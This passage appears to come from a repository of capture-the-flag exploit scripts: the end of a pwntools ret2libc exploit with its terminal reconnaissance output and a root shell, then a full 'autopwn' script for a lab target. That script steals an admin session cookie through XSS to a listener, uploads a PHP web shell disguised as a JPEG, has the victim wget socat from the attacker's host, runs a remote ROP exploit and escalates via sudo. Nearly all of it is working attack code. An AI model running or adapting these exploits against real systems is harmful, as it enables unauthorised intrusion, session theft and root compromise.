 32 | 0x0000000000401120  access@plt
 33 | 0x0000000000401130  fopen@plt
 34 | 0x0000000000401140  __isoc99_scanf@plt
 35 | 0x0000000000401150  strcat@plt
 36 | 0x0000000000401160  exit@plt
 37 | 0x0000000000401170  _start
 38 | 0x00000000004011a0  _dl_relocate_static_pie
 39 | 0x00000000004011b0  deregister_tm_clones
 40 | 0x00000000004011e0  register_tm_clones
 41 | 0x0000000000401220  __do_global_dtors_aux
 42 | 0x0000000000401250  frame_dummy
 43 | 0x0000000000401252  func1
 44 | 0x0000000000401260  func2
 45 | 0x0000000000401274  func3
 46 | 0x0000000000401283  func4
 47 | 0x0000000000401291  func5
 48 | 0x000000000040129f  func6
 49 | 0x00000000004012ad  func7
 50 | 0x00000000004012bb  func8
 51 | 0x00000000004012e1  func9
 52 | 0x0000000000401316  launch
 53 | 0x0000000000401329  cancel
 54 | 0x000000000040133c  checkbalance
 55 | 0x000000000040135c  print_hex
 56 | 0x0000000000401387  print_decimal
 57 | 0x00000000004013b2  unused_func
 58 | 0x0000000000401459  check_user
 59 | 0x00000000004014d4  set_username
 60 | 0x0000000000401513  auth
 61 | 0x0000000000401619  main
 62 | 0x0000000000401740  __libc_csu_init
 63 | 0x00000000004017a0  __libc_csu_fini
 64 | 0x00000000004017a4  _fini
 65 | 
 66 | 
 67 | root@kali:~/Scrivania/binaries/garbage# ROPgadget --binary garbage | grep 'pop rdi'
 68 | 0x000000000040179b : pop rdi ; ret
 69 | 
 70 | 
 71 | root@kali:~/Scrivania/binaries/garbage# objdump -D garbage | grep puts
 72 | 0000000000401050 <puts@plt>:
 73 |   401050:	ff 25 d2 2f 00 00    	jmpq   *0x2fd2(%rip)        # 404028 <puts@GLIBC_2.2.5>
 74 |   401321:	e8 2a fd ff ff       	callq  401050 <puts@plt>
 75 |   401334:	e8 17 fd ff ff       	callq  401050 <puts@plt>
 76 |   4014c3:	e8 88 fb ff ff       	callq  401050 <puts@plt>
 77 |   4015fa:	e8 51 fa ff ff       	callq  401050 <puts@plt>
 78 |   40160d:	e8 3e fa ff ff       	callq  401050 <puts@plt>
 79 |   401651:	e8 fa f9 ff ff       	callq  401050 <puts@plt>
 80 |   40165d:	e8 ee f9 ff ff       	callq  401050 <puts@plt>
 81 |   401669:	e8 e2 f9 ff ff       	callq  401050 <puts@plt>
 82 |   401675:	e8 d6 f9 ff ff       	callq  401050 <puts@plt>
 83 |   401681:	e8 ca f9 ff ff       	callq  401050 <puts@plt>
 84 |   40168d:	e8 be f9 ff ff       	callq  401050 <puts@plt>
 85 |   401699:	e8 b2 f9 ff ff       	callq  401050 <puts@plt>
 86 |   40171c:	e8 2f f9 ff ff       	callq  401050 <puts@plt>
 87 | 
 88 | 
 89 | readelf -s /lib/x86_64-linux-gnu/libc.so.6| grep puts
 90 |    194: 0000000000074040   429 FUNC    GLOBAL DEFAULT   14 _IO_puts@@GLIBC_2.2.5
 91 |    426: 0000000000074040   429 FUNC    WEAK   DEFAULT   14 puts@@GLIBC_2.2.5
 92 |    501: 00000000000fefe0  1241 FUNC    GLOBAL DEFAULT   14 putspent@@GLIBC_2.2.5
 93 |    685: 0000000000100ae0   697 FUNC    GLOBAL DEFAULT   14 putsgent@@GLIBC_2.10
 94 |   1154: 0000000000072af0   338 FUNC    WEAK   DEFAULT   14 fputs@@GLIBC_2.2.5
 95 |   1698: 0000000000072af0   338 FUNC    GLOBAL DEFAULT   14 _IO_fputs@@GLIBC_2.2.5
 96 |   2336: 000000000007cd00   151 FUNC    WEAK   DEFAULT   14 fputs_unlocked@@GLIBC_2.2.5
 97 | 
 98 | 
 99 | root@kali:~/Scrivania/binaries/garbage# strings -a -t x /lib/x86_64-linux-gnu/libc.so.6 | grep /bin/sh
100 |  183cee /bin/sh
101 | 
102 |  readelf -s /lib/x86_64-linux-gnu/libc.so.6 | grep system
103 |    235: 0000000000129d20    99 FUNC    GLOBAL DEFAULT   14 svcerr_systemerr@@GLIBC_2.2.5
104 |    613: 0000000000046ff0    45 FUNC    GLOBAL DEFAULT   14 __libc_system@@GLIBC_PRIVATE
105 |   1421: 0000000000046ff0    45 FUNC    WEAK   DEFAULT   14 system@@GLIBC_2.2.5
106 | 
107 | 
108 | root@kali:~/Scrivania/binaries/garbage# ./exploit.py 
109 | 	[+] Starting program './garbage': Done
110 | 	[+] leaked puts address: 0x7fc6452f7040
111 | 	[*] offset: 0x7fc645283000
112 | 	[+] /bin/sh address: 0x7fc645406cee
113 | 	[+] system() address: 0x7fc6452c9ff0
114 | 	[*] Switching to interactive mode
115 | 	$ whoami
116 | 	root
117 | 	$
118 | """
119 | 
120 | from pwn import *
121 | 
122 | p = process("./garbage")
123 | 
124 | 
125 | password = "N3veRF3@r1iSh3r3!"
126 | 
127 | junk = ("A" * 136).encode()
128 | 
129 | pop_gadget = p64(0x40179b) # pop rdi ; ret
130 | puts_got = p64(0x404028)
131 | puts_plt = p64(0x401050)
132 | main_plt = p64(0x401619)
133 | 
134 | puts_libc = 0x74040
135 | 
136 | bin_sh_string_libc = 0x183cee
137 | system_libc = 0x46ff0
138 | 
139 | 
140 | #First stage: leaking puts@got to calculate the offset
141 | 
142 | buf = b""
143 | buf += junk
144 | buf += pop_gadget
145 | buf += puts_got
146 | buf += puts_plt
147 | buf += main_plt
148 | 
149 | p.sendline(buf)
150 | 
151 | p.recvuntil("access denied.")
152 | 
153 | p.recvline()
154 | 
155 | leaked_puts = u64(p.recv().strip().ljust(8, b"\x00"))
156 | offset = (leaked_puts - puts_libc)
157 | 
158 | 
159 | log.success("leaked puts address: " + str(hex(leaked_puts)))
160 | log.info("offset: " + str(hex(offset)))
161 | 
162 | 
163 | bin_sh = p64( bin_sh_string_libc + offset)
164 | system = p64( system_libc + offset )
165 | 
166 | log.success("/bin/sh address: " + hex(u64(bin_sh)))
167 | log.success("system() address: " + hex(u64(system)))
168 | 
169 | buf = b""
170 | buf += junk
171 | buf += pop_gadget
172 | buf += bin_sh
173 | buf += system
174 | 
175 | p.sendline(buf)
176 | 
177 | p.recv()
178 | 
179 | 
180 | p.interactive()
181 | 
182 | 


--------------------------------------------------------------------------------
/autopwn/sixes/autopwn.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/env python
  2 | 
  3 | import os
  4 | import re
  5 | import sys
  6 | import time
  7 | import fcntl
  8 | import struct
  9 | import requests
 10 | import random
 11 | import subprocess
 12 | 
 13 | from shutil import copyfile
 14 | from string import letters as chars
 15 | from urllib import quote
 16 | from pwn import *
 17 | 
 18 | 
 19 | class networking:
 20 | 
 21 | 	@staticmethod
 22 | 	def checkipaddress(address):
 23 | 		try:
 24 | 			socket.inet_aton(address)
 25 | 			return True
 26 | 		except socket.error:
 27 | 			return False
 28 | 
 29 | 	@staticmethod
 30 | 	def checkport(port):
 31 | 		try:
 32 | 		    s = socket.socket()
 33 | 		    s.connect((rhost, port))
 34 | 		    s.close()
 35 | 		    return True
 36 | 		except socket.error:
 37 | 			return False
 38 | 	@staticmethod
 39 | 	def getipaddress(ifname):
 40 | 		try:
 41 | 		    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
 42 | 		    return socket.inet_ntoa(fcntl.ioctl(
 43 | 			    s.fileno(),
 44 | 			    0x8915,  # SIOCGIFADDR
 45 | 			    struct.pack('256s', ifname[:15])
 46 | 		    )[20:24])
 47 | 		except IOError:
 48 | 			return False
 49 | 
 50 | 
 51 | class http:
 52 | 	@staticmethod
 53 | 	def getparameters(url):
 54 | 		try:
 55 | 		    valid = []
 56 | 		    response = requests.get(url, headers=config.headers)
 57 | 		    hrefs = re.findall('href="(.*?)"', response.text)
 58 | 		    for href in hrefs:
 59 | 		    	if href.endswith("php") or 'id=' in href:
 60 | 		    		valid.append(href[1:])
 61 | 		    return valid
 62 | 		except:
 63 | 			return False
 64 | 	@staticmethod
 65 | 	def testsqlinjection(url):
 66 | 		try:
 67 | 			temp = url + (" AND 1=1")
 68 | 			first = requests.get(temp, headers=config.headers)
 69 | 
 70 | 			temp = url + (" AND 1=0")
 71 | 			second = requests.get(temp, headers=config.headers)
 72 | 			if len(first.text) == len(second.text):
 73 | 				return False
 74 | 			return True
 75 | 
 76 | 		except:
 77 | 			return False
 78 | 	@staticmethod
 79 | 	def testxss(url, lurl):
 80 | 		try:
 81 | 
 82 | 			params = {
 83 | 			    "feedback": "test",
 84 | 			    "url":lurl,
 85 | 			    "description":"test"
 86 | 			}
 87 | 			response = requests.post(url, data=params, headers=config.headers)
 88 | 			return True
 89 | 		except Exception as error:
 90 | 			return False
 91 | 
 92 | 	@staticmethod
 93 | 	def testadmincookie(url, cookies):
 94 | 		try:
 95 | 			first = requests.get(url, headers=config.headers)
 96 | 			second = requests.get(url, headers=config.headers, cookies=cookies)
 97 | 			if len(first.text) == len(second.text):
 98 | 				return False
 99 | 			return True
100 | 		except:
101 | 			return False
102 | 	@staticmethod
103 | 	def testfileupload(url,cookies, payload, filename):
104 | 		with open(filename, "wb") as f:
105 | 			f.write(config.magicbytes + payload)
106 | 		files = {"image":open(filename,"rb")}
107 | 		params = {"Referer":"http://192.168.1.232/admin.php", "submit":"Upload"}
108 | 		try:
109 | 			response = requests.post(url, cookies=cookies, data=params, files=files, headers=config.headers)
110 | 			if "uploaded" in response.text:
111 | 				return True
112 | 			return False				
113 | 		except:
114 | 			return False
115 | 	@staticmethod
116 | 	def testcodeexecution(url, filename, command):
117 | 		try:
118 | 			temp = url + "/img/" + filename + "?cmd=" + command
119 | 			response = requests.get(temp)
120 | 			if response.status_code == 200:
121 | 				return "".join(list(response.text)[12:]).strip().encode("utf-8")
122 | 			return False
123 | 		except:
124 | 			return False
125 | 
126 | 
127 | class config:
128 | 	def __init__(self, rhost, lhost):
129 | 		self.rhost = rhost
130 | 		self.lhost = lhost
131 | 		self.url = "http://" + rhost
132 | 		self.ports = [21,22,80]
133 | 
134 | 		self.headers = {
135 | 		    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0"
136 | 
137 | 		}
138 | 
139 | 		self.sockettimeout = 120 # seconds
140 | 		socket.setdefaulttimeout(self.sockettimeout)
141 | 
142 | 		self.magicbytes = "\xFF\xD8\xFF\xE0\x00\x10\x4A\x46\x49\x46\x00\x01" # JPEG
143 | 		self.backdoor = '<?php system($_REQUEST["cmd"]); ?>'
144 | 
145 | def helpuser():
146 | 	log.failure("{} <rhost> <lhost or interface>".format(sys.argv[0]))
147 | 	sys.exit()
148 | 
149 | if __name__ == "__main__":
150 | 	if len(sys.argv) != 3:
151 | 		helpuser()
152 | 	rhost = sys.argv[1]
153 | 	lhost = sys.argv[2]
154 | 	if networking.checkipaddress(lhost):
155 | 		pass
156 | 	elif networking.getipaddress(lhost):
157 | 		lhost = networking.getipaddress(lhost)
158 | 	else:
159 | 		helpuser()
160 | 
161 | 	if os.path.exists("./socat"):
162 | 		socatlocation = "./socat"
163 | 	elif os.path.exists("/usr/bin/socat"):
164 | 		socatlocation = "/usr/bin/socat"
165 | 	else:
166 | 		log.info("socat should be in . or /usr/bin/")
167 | 		log.failure("something went wrong!")
168 | 		sys.exit()
169 | 
170 | 
171 | 	config = config(rhost,lhost)
172 | 
173 | 	log.info("target {} selected...".format(rhost))
174 | 	print
175 | 	for port in config.ports:
176 | 		if networking.checkport(port):
177 | 			log.success("port {} seems to be open!".format(port))
178 | 		else:
179 | 			log.failure("port {} seeems to be close: something went wrong!".format(port))
180 | 			sys.exit()
181 | 
182 | 	## first step: parse html to find parameters
183 | 	print
184 | 	log.info("going to parse port 80...")
185 | 	hrefs = http.getparameters(config.url)
186 | 	for href in hrefs:
187 | 		url = config.url + href
188 | 		response = requests.get(url, headers=config.headers)
189 | 		if response.status_code == 200:
190 | 			log.success("got {} [200]".format(config.url + href))
191 | 		else:
192 | 			log.failure("got {} [{}]".format(config.url + href, response.status_code))
193 | 	
194 | 	print
195 | 	log.info("going to test SQLi and XSS vulnerabilities...")
196 | 	print
197 | 	url = config.url + hrefs[-1]
198 | 	log.info("testing SQLi at {}".format(url))
199 | 	if http.testsqlinjection(url):
200 | 		log.success("SQL injection seems to be there: maybe can you contribute to this script?")
201 | 	else:
202 | 		log.failure("something went wrong!")
203 | 		sys.exit()
204 | 
205 | 	url = config.url + hrefs[2]
206 | 	random_port = random.randint(1025, 65535)
207 | 	lurl = "http://" + config.lhost + ":" + str(random_port)
208 | 	print
209 | 	log.info("testing XSS to steal cookies at {}".format(url))
210 | 
211 | 	## deliver xss payload and fireup a python server with some timeout
212 | 	
213 | 	log.info("going to deliver xss payload...")
214 | 	if http.testxss(url,lurl):
215 | 		log.info("going to setup a socket server for 120 seconds [{}:{}]".format(config.lhost, random_port))
216 | 		s = socket.socket()
217 | 		s.bind((lhost, random_port))
218 | 		s.listen(1)
219 | 		try:
220 | 		    client, address = s.accept()
221 | 		except socket.timeout:
222 | 			log.failure("something went wrong!")
223 | 			sys.exit()
224 | 
225 | 		log.success("request received from {}:{}...".format(address[0],address[1]))
226 | 		request = client.recv(1024).strip().split("\n")[-1]
227 | 		client.close()
228 | 		s.close()
229 | 		cookie = request.split("=")[-1].strip()
230 | 		log.success("admin's PHPSESSID fucked {}".format(cookie))
231 | 
232 | 	else:
233 | 		log.failure("something went wrong!")
234 | 		sys.exit()
235 | 	print
236 | 	## once fucked you have to upload a malicious image
237 | 
238 | 	cookies = {
239 | 	    "PHPSESSID": cookie
240 | 	}
241 | 
242 | 	url = config.url + hrefs[3]
243 | 
244 | 	if http.testadmincookie(url, cookies):
245 | 		log.success("login as admin works, trying to upload malicious image...")
246 | 	else:
247 | 		log.failure("something went wrong!")
248 | 
249 | 	filename = ""
250 | 	for i in range(0, 10):
251 | 		filename += random.choice(chars)
252 | 	filename += ".php"
253 | 
254 | 	log.success("malicious file has been created...")
255 | 	log.info("going to upload {}...".format(filename))
256 | 	if http.testfileupload(url, cookies, config.backdoor, filename):
257 | 		log.success("file uploaded!")
258 | 	else:
259 | 		log.failure("something went wrong!")
260 | 		sys.exit()
261 | 
262 | 	log.info("testing code execution...")
263 | 	junk = "A" * 30
264 | 	response = http.testcodeexecution(config.url, filename, "echo {}".format(junk))
265 | 	if response and junk in response:
266 | 		whoami = http.testcodeexecution(config.url,filename, "whoami")
267 | 		if whoami:
268 | 		    log.success("the exploit is working: whoami? {}".format(whoami))
269 | 		else:
270 | 			log.failure("something went wrong!")
271 | 			sys.exit()
272 | 	else:
273 | 		log.failure("something went wrong!")
274 | 		sys.exit()
275 | 	backdoor = filename
276 | 	print
277 | 	# enumeration: find SUID files and exploit one of them
278 | 	log.info("going to enumerate SUID files, this could take a while...")
279 | 	command = "find / -perm -4000 -type f 2>/dev/null"
280 | 	files = http.testcodeexecution(config.url, backdoor, command)
281 | 	if files:
282 | 		binaryfile = files.split("\n")[-1]
283 | 	else:
284 | 		log.failure("something went wrong!")
285 | 		sys.exit()
286 | 
287 | 
288 | 
289 | 	permissions = http.testcodeexecution(config.url, backdoor, "ls -l {}".format(binaryfile))
290 | 	if permissions:
291 | 		log.success("found {}".format(permissions))
292 | 	else:
293 | 		log.failure("something went wrong!")
294 | 		sys.exit()
295 | 
296 | 	print
297 | 
298 | 	## upload socat and launch that to expose /sbin/notemaker then pwntools!
299 | 	log.info("going to exploit {}...".format(binaryfile))
300 | 
301 | 	## copy socat here -> fireup python -m -> call wget -> chmod +x -> subprocess + request to fireup socat then exploit.py
302 | 	files = os.listdir(os.getcwd())
303 | 	if not socatlocation.split("/")[-1] in files:
304 | 		copyfile(socatlocation, os.getcwd() + "/socat")
305 | 		socatlocation = os.getcwd() + "/socat"
306 | 
307 | 	null = open(os.devnull, "w")
308 | 
309 | 	random_port = str(random.randint(1025, 65535))
310 | 	log.info("going to fire up a python simpleserver [{}:{}]".format(config.lhost, random_port))
311 | 	log.info("uploading socat and setting permissions to expose {}...".format(binaryfile))
312 | 
313 | 	process = subprocess.Popen('python -m SimpleHTTPServer {} 2> /dev/null'.format(random_port), shell=True, stdout=null)
314 | 	http.testcodeexecution(config.url, backdoor, "wget http://{}:{}/socat -O socat".format(config.lhost, random_port))
315 | 	time.sleep(10)
316 | 	process.kill()
317 | 
318 | 	# try to set permissions and check if file exists and is properly executable
319 | 	http.testcodeexecution(config.url, backdoor, "chmod 777 /var/www/html/img/socat")
320 | 	socat_permissions = http.testcodeexecution(config.url, backdoor, "ls -l socat")
321 | 	if socat_permissions:
322 | 		log.success("file uploaded with success: {}".format(socat_permissions))
323 | 	else:
324 | 		log.failure("something went wrong!")
325 | 		sys.exit()
326 | 
327 | 	random_port = str(random.randint(1025, 65535))
328 | 	log.info("trying to expose {} on port {}...".format(binaryfile, random_port))
329 | 	command = './socat TCP-LISTEN:{},reuseaddr,fork EXEC:"{}"'.format(random_port, binaryfile)
330 | 	try:
331 | 		requests.get(config.url + "/img/" + backdoor + "?cmd=" + command, timeout=3)
332 | 	except requests.exceptions.ReadTimeout:
333 | 		pass
334 | 
335 | 	try:
336 | 	    s = socket.socket()
337 | 	    s.connect((config.rhost, int(random_port)))
338 | 	    s.close()
339 | 	except:
340 | 		log.failure("something went wrong!")
341 | 		sys.exit()
342 | 	log.success("{} exposed with success!".format(binaryfile))
343 | 	print
344 | 
345 | 	pop_rdi = p64(0x4014eb)
346 | 	puts_plt = p64(0x401050)
347 | 	puts_got = p64(0x404028)
348 | 	main_plt = p64(0x401370)
349 | 	junk = "A" * 280
350 | 	io = remote(config.rhost, (random_port))
351 | 	io.recv()
352 | 	io.clean()
353 | 	payload = junk + pop_rdi + puts_got + puts_plt + main_plt
354 | 	io.sendline(payload)
355 | 	recv = io.recv()
356 | 	puts_leak = u64(recv.split("\n")[0].strip().ljust(8, "\x00"))
357 | 	libc_base_address = (puts_leak - 0x809c0)
358 | 	onegadget = p64(libc_base_address + 0x4f322)
359 | 	log.success("puts@leaked: {}".format(hex(puts_leak)))
360 | 	log.success("libc_base_address: {}".format(hex((libc_base_address))))
361 | 	log.success("one gadget address: {}".format(hex(u64(onegadget))))
362 | 	payload = junk + onegadget
363 | 	io.clean()
364 | 	io.sendline(payload)
365 | 	io.sendline("whoami")
366 | 	log.success("whoami? {}".format(io.recv().strip()))
367 | 
368 | 	io.sendline("sudo -l")
369 | 	sudo = io.recv().strip().split("\n")[-1].strip()
370 | 	log.success("{}".format(sudo))
371 | 	print
372 | 	log.info("trying privesc via sudo -l technique")
373 | 	io.sendline("sudo service ../../bin/sh")
374 | 
375 | 	io.sendline("whoami")
376 | 
377 | 	log.success("got root? {}".format(io.recv().strip()))
378 | 
379 | 	log.success("popping shell...")
380 | 	io.interactive()
381 | 
382 | 	
383 | 
384 | 


--------------------------------------------------------------------------------